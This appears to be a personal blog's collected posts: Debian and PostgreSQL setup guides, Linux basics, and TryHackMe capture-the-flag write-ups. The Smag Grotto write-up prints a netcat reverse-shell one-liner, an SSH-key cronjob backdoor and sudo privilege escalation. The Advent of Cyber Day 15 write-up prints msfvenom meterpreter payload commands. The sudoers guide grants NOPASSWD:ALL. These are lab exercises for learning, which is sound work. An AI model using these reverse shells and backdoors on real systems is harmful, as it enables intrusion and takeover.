How to Install PostgreSQL on Debian 12: A Step-by-Step Guide

PostgreSQL, commonly known as Postgres, is a powerful, open-source relational database management system renowned for its advanced features and reliability. In this comprehensive step-by-step tutorial, we will guide you through the process of installing PostgreSQL on a Debian 12 system

Step 1: Update the System

Start by ensuring your Debian 12 system is up to date.  Open a terminal and run the following commands:

sudo apt update
sudo apt upgrade

This command will update the package list and upgrade existing packages on your system

Step 2: Install PostgreSQL

To install PostgreSQL on Debian 12, use the following command:

sudo apt install postgresql postgresql-contrib

This command will install both the PostgreSQL server and additional contrib packages that provide useful extensions and utilities

Step 3: Start and Enable PostgreSQL

PostgreSQL should start automatically after installation

However, to ensure it starts at boot, use the following command:

sudo systemctl enable postgresql

To check the status of the PostgreSQL service, use:

sudo systemctl status postgresql

Step 4: Create a PostgreSQL User and Database

Let’s create a new PostgreSQL user and database

Replace your_user and your_database with your preferred values:

sudo -u postgres createuser your_user
sudo -u postgres createdb -O your_user your_database

To access the PostgreSQL command-line tool, psql, use the following command:

sudo -u postgres psql -d your_database

Once in the psql prompt, execute the following SQL commands to create a basic table:

CREATE TABLE example (
    id serial PRIMARY KEY,
    name VARCHAR (100),
    age INT
);

Step 5: Managing the PostgreSQL Service

To manage the PostgreSQL service on Debian 12, you can use the following commands

•     Start PostgreSQL service:

sudo systemctl start postgresql

• Stop PostgreSQL service:

sudo systemctl stop postgresql

• Restart PostgreSQL service:

sudo systemctl restart postgresql

• Check PostgreSQL service status:

sudo systemctl status postgresql

Congratulations! You have successfully installed PostgreSQL on your Debian 12 server, created a database, and learned how to perform basic management tasks

PostgreSQL’s extensive feature set makes it a versatile choice for various data storage needs.

How to Install ifconfig on Debian

Do you see ifconfig command not found error in Debian? Here is my quick tutorial on how to install it on Debian.

 

I have made fresh install of Debian 12 server on my VM and  i wanted to check IP of VM and I have encountered the problem:

 The ifconfig package is not included by default in Debian since it is being phased out in favor of the ip command. The ip command now handles tasks such as modifying or displaying routing, network devices, interfaces, and tunnels."

 If we still want to use the good old ifconfig command, you'll have to install it explicitly.

 

Installing ifconfig command in Debian 

The ifconfig is not a package in its own. It is installed with net-tools package that has some additional networking tools. 

So to get ifconfig, you need to install net-tools package like this:

sudo apt install net-tools

After install you can use the command:

However, I strongly advise you should start using the IP command. Sooner or later, net-tools will be completely deprecated and you won't be able to install it.

File Permissions in Linux

 

File Permissions in Linux

1. chmod (Change Mode)

The chmod command allows you to modify file permissions. These permissions control read, write, and execute access for the owner, group, and others. Here are two ways to use chmod:

• Symbolic Mode:

  • Syntax: chmod [ugoa] [[+-=] [mode]] file
  • Example: To add write permission for the user, group, and others to a file named file1, use:

    chmod ugo+w file1
    

• Numeric Mode:

  • The mode is a combination of three digits:
    • First digit: User permissions
    • Second digit: Group permissions
    • Third digit: Others’ permissions
  • Example: To give read/write/execute permission to the user, read/execute permission to the group, and execute permission to others, use:

    chmod 751 file1
    

2. chown (Change Ownership)

The chown command changes the ownership of a file. Only the current owner can change ownership. Syntax:

chown [owner] [file]

Example: To change the owner of file1 to user2, assuming it’s currently owned by the current user:

chown user2 file1

3. chgrp (Change Group Ownership)

The chgrp command changes the group ownership of a file. Like chown, only the owner can perform this action. Syntax:

chgrp [group] [file]

Example: To change the group of file1 to group2, assuming it’s currently owned by the current user:

chgrp group2 file1

Understanding these commands will empower you to manage permissions effectively. Happy learning!

Day 2: “Linux Distributions Explained” - Discuss different distros and their use cases.

Linux is a family of free and open-source operating systems based on the Linux kernel. These operating systems are known as Linux distributions or as users calls them - distros. Examples include Debian, Ubuntu, Fedora, CentOS, Gentoo, Arch Linux, and others. Each distro has its unique features, package management system, and community.

If you’re new to Linux, it’s essential to understand that Linux filesystems have a different structure than those found on Windows or macOS. Additionally, Linux-based systems rely heavily on the command line interface (CLI), where you interact with the system by typing commands. Becoming comfortable with the terminal is crucial for tasks like file manipulation, package installation, and user management

1. Ubuntu - ubuntu.com
Features:

• Based on Debian, Ubuntu emphasizes ease of use and accessibility.
• Regular LTS (Long-Term Support) releases (e.g., 20.04, 22.04) provide stability.
• Extensive community support through forums, documentation, and Ask Ubuntu.
• Variants include Ubuntu Desktop, Ubuntu Server, and flavors like Kubuntu (KDE), Xubuntu (Xfce), and Lubuntu (LXQt).

Use Cases:

• General-purpose desktops for both beginners and experienced users.
• Servers, especially with Ubuntu Server.
• Cloud deployments (e.g., on AWS, Azure, or Google Cloud).

Installation: Graphical installer (Ubiquity) for desktop editions.
Command-line installer for server editions.

2. Fedora - fedoraproject.org
Features:

• Sponsored by Red Hat, Fedora serves as a testing ground for RHEL.
• Frequent updates, embracing bleeding-edge technologies.
• Focus on open-source software and community-driven development.
• Workstation edition tailored for developers and enthusiasts.
Use Cases:

• Developers who want the latest software.
• Enthusiasts exploring new features.
• Fedora Server for lightweight server deployments.
Installation:

• Graphical Anaconda installer with customization options.



3. CentOS - centos.rog
Features:


• Derived from RHEL (Red Hat Enterprise Linux).
• Stable, with long support cycles.
• Ideal for servers, data centers, and enterprise environments.
• Minimal changes compared to RHEL.
Use Cases:

• Enterprise servers where stability is critical.
• Hosting web applications, databases, and services.
Installation:

• Text-based installer similar to RHEL.



Important!CentOS Linux 7 reached end of life (EOL) on June 30, 2024. This means that official support and updates from the CentOS project have ceased. No additional security patches, bug fixes, or software upgrades will be released for the operating system1. However, there’s good news: you can convert your CentOS Linux servers into Red Hat Enterprise Linux (RHEL) servers, and this process is supported. You can work with Red Hat’s support and consulting teams to facilitate the migration2. If you’re using CentOS, it’s essential to plan your transition to a supported platform to ensure ongoing security and stability




4. Arch Linux - Arch Linux
Features:


• Lightweight, minimalistic, and highly customizable.
• Rolling release model—no major version upgrades.
• DIY approach: You build your system from scratch.
• AUR (Arch User Repository) for additional packages.
Use Cases:

• Advanced users who enjoy fine-tuning their system.
• Minimal installations for specific purposes.
• Learning about Linux internals.
Installation:

• Command-line-based Arch Install Scripts (AIS).
• Requires manual configuration.

5. Debian - debian.org
Features:


• Oldest surviving distro, known for stability.
• Large package repository.
• Used as the base for many other distros.
• Supports multiple architectures.
Use Cases:

• Servers (Debian Stable).
• Workstations (Debian Testing or Unstable).
• Embedded systems (Debian Embedded).
Installation:

• Graphical or text-based installer (Debian Installer).



If you would like to find out more about Linux distribuions visit DistroWatch which is a comprehensive website that provides news, rankings, and general information about various Linux distributions and other free software/open-source Unix-like operating systems. It’s a valuable resource for users seeking to choose a suitable Linux distro and also raises awareness for smaller distributions.

Debian Server 12 - adding user to sudoers

sudo is a command-line utility that allows trusted users to run commands as another user, by default root. This tutorial shows two ways to grant sudo privileges to a user.

1. Step -On my VM Debian Server I had to install the sudo utility first as root user I ran

   apt install sudo

2. Step is to add user you sudoers file. To do so you need to as root user run visudo and at the end of file add

   username ALL=(ALL) NOPASSWD:ALL

3. Step is to add user to the sudo group, again as root you run

   usermod -aG sudo username

4. Step you can now check if you can use sudo command as user you created before and if you followed those steps you should be able to run commands as trusted user

TryHackMe - Smag Grotto - writeup

Smag Grotto is one of the easy CTF rooms on the TryHackMe.com. Here are my steps that lead me to the successful solution and finding both user and root flag. Before you start you need to boot up the VM and attackbox machine.

1. step
First I have run nmap scan:

nmap -sC VM_IP

Scan gives me that only 2 ports are open - ssh and http. Connection to the page ip, didnt give me much more info.
2. step
I then tried researching the VM with gobuster:

gobuster dir -t 40 -u VM_IP -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt

With gobuster I find /mail folder.
3. step
Then I opened /mail folder where we find the email correspondence with .pcap trace file.
4. step
I have downloaded the pcap file and open it with wireshark.In the trace file I have found the new domain where site is located. I also found the username and password for login.
5. step
To access new domain I have added VM_IP and new domain I have found in .pcap file to the /etc/hosts file on attackbox machine.
6. step
Now I have entered domain to the web browser and found login.php script and enter credentials from .pcap file.
7. step
After the login you are at site where you can enter commands. I had to look around the internet to get hint what to do in this step. In this step we initiate the reverse shell and start nc listener on attack box. I have run:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc Attackbox_IP 1338 >/tmp/f

On the attackbox I have started nc listener:

nc -lvnp 1338

8. step
In a second I got shell access as www-data. After that I have checked cronjob settings and see that there is copy of the /opt/.backups/jake_ir_rsa.pub.backup public key to the authorised keys. Hmmm I think we could exploit this one by putting our public key instead of legit key.
9. step
On attackbox machine we can create our public key with following command:

ssh-keygen -t rsa -P '' -f jakekey

then we open key file and copy to the target machine with :

echo "public_key_we_created" > jake_id_rsa.pub.backup

Note that you need to create file in /opt/.backups/ folder and filename needs to be as stated above that cronjob will take our file and we can login to the machine.
10. step
Ok in this step I tried to log in to the machine using key. But of course I bit forgot how to do it so I had to look for little help what is exact command to use ssh keys to connect to the machine.

ssh -i jakekey jake@devleopment.smag.thm

then I pressed enter and I was logged in as jake. We can now search for the user flag.

find / -type f -name user.txt 2>/dev/null

11. step
Then I can open user.txt file and copy the flag.
12. step
Now I was missing only root flag and I could access file only as root. I checked what programs I could run as jake user:

sudo -l

Output of the command showed us that apt-get command can be run as jake user.
13. step
To do so we head over to the GTFObins and we find the command that we can run as current user to get root access.


14. step
We can find root flag at:

cat /root/root.txt

I hope anyone who gets stuck finds it helpful
AudiTTRSi

TryHackMe.com - Advent of Cyber 2022 - Day 17 - writeup

Advent of Cyber is now regular seasonal room on TryHackMe page. This is their 4th time and again with awsome story to follow each day's assignment. Day 17 covers topic of the Regular Expressions.

1. Question 1, Question 2
To answer first two questions you can use following regular expression:

^[a-zA-Z0-9]{6,12}$

2. Question 3, Question 4
Following regular expression will help you get answers:

^.+@.+\.com$

3. Question 5
Following regular expression will help you get answers:

lewisham44

4. Question 6
Following regular expression will help you get answers:

maxximax

5. Question 7
Following regular expression will help you get answers:

^.+@.+\.com$

6. Question 8, Question 9

^http(s)?.{3}(www)?.+..+$

I hope anyone who gets stuck finds it helpful
AudiTTRSi

TryHackMe - ItsyBitsy - writeup

ItsyBitsy room is second room in Security Information and Event Management module of the SOC Level 1 path on TryHackMe. Put your ELK knowledge together and investigate an incident. First you will need to boot up VM and Attackbox which will take few minutes. After attackbox is is booted up we can open Firefox browser and access the Kibana.

1. Question 1 - How many events were returned for the month of March 2022?
Change the date range to look at March 2022 log and you can answer first question.
2. Question 2 -What is the IP associated with the suspected user in the logs?
Question is asking about the source_ip filed. From the logs we can see 2 IP addresses so you much work to find right one.
3. Question 3 - The user’s machine used a legit windows binary to download a file from the C2 server. What is the name of the binary?
Answering this question took me longest time because I didnt find the right answer because I was either looking at wrong place or looked at right answer but not realising this was the answer. Hint look at the user_agent field ;)
4. Question 4 - The infected machine connected with a famous filesharing site in this period, which also acts as a C2 server used by the malware authors to communicate. What is the name of the filesharing site?
When we filter by IP from Question 2 we can answer this one quckly because there are only 2 logs from that source_ip.
5. Question 5 - What is the full URL of the C2 to which the infected host is connected?
Hostname + url field
6. Question 6 - A file was accessed on the filesharing site. What is the name of the file accessed?
We can connect to the filesharing site from URL from previous question and find a file there.
7. Question 7 - The file contains a secret code with the format THM{_____}.
Open file in the filesharing site and copy the flag code.

I hope anyone who gets stuck finds it helpful
AudiTTRSi

TryHackMe.com - Advent of Cyber 2022 - Day 16 - writeup

Advent of Cyber is now regular seasonal room on TryHackMe page. This is their 4th time and again with awsome story to follow each day's assignment. Today's task covers topic of SQL Injection (SQLi). SQL injection is the placement of malicious code in SQL statements, via web page input. Attackers will most probably try to querry the database return all of the users and passwords of the application if this vulnerability exist. Before you start with solving task you need to boot up VM in the task and attackbox for accessing the page. It will probably take a minute or two to boot up. After that we can open link to the developer page of the app we will try to fix. We login with provided credentials.

1. Question 1 - Fixing SQLi by Data Type Validation
First we use fix from description of the task to fix first and then second querry in the elf.php file after we have saved and press run we will get the first flag
2. Question 2 - Fixing SQLi Using Prepared Statements
With prepared statment described in the task we can quickly fix the search_toys.php and get second flag.
3. Question 3
To find the third flag we need to fix toy.php we can easly fix it same way we fix the elf.php with data type validation.
4. Question 4
For fixing the 4th vunlerability and getting forth flag we will need to fix the login.php. We do it with prepared statment as we did with second flag. Just make sure you use $username and $password instead of $q

I hope anyone who gets stuck finds it helpful
AudiTTRSi

TryHackMe.com - Advent of Cyber 2022 - Day 15 - writeup

Advent of Cyber is now regular seasonal room on TryHackMe page. This is their 4th time and again with awsome story to follow each day's assignment. Here are my solutions for the Day 15, if anyone gets stuck or need bit of help solving questions. Today's task is addressing issues of input validation of file upload funtionality and unrestricted file upload vulnerabilities. If any of these things are implemented during development of the site threat actor can exploit it and get access to the server. First you need to boot up VM and Attackbox since they will take some time to boot up. All questions exepct Q3 can be answered by carefully reading task description of vulnerabilities and how to avoid them. For Q3 we need to create the paypload, we got the command in task description:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=AttackBox_IP LPORT="Listening port" -f exe -o cv-username.exe

It will take a minute to generate it. It will be saved on attackbox /root folder. then you run second command to create the listener :

sudo msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_tcp; set LHOST AttackBox_IP; set LPORT 'listening port'; exploit"

After that we can head to the firefox browser and upload the payload file we created with first step. Now we can open listener window and wait until the file that we uploaded to website will be run. When connection is active we can move through directories

1. pwd to check where we are
2. cd ../..
3. we head to the folder HR Elf's Documents directory
4. cat flag.txt

I hope anyone who gets stuck finds it helpful
AudiTTRSi

TryHackMe.com - Advent of Cyber 2022 - Day 14 - writeup

Advent of Cyber is now regular seasonal room on TryHackMe page. This is their 4th time and again with awsome story to follow each day's assignment. Here are my solutions for the Day 14, if anyone gets stuck or need bit of help solving questions. First you need to boot up VM and attackbox since they will take some time to boot up. After both VM and attackbox machine are booted up you can open the website on provided ip and port 8080 and log in with credentials provided in description of the task. Because of vulnerability present in the website applicaton we can freely change ids in the web address and we cycle (changing profile id numbers) through registered users and find answer to the first question.
For second one we copy profile picture and we change id number for images, because profile images have same vulnerability and we can cycle through pictures and we can find the picuter containing flag which is answer of the second question. I hope anyone who gets stuck finds it helpful
AudiTTRSi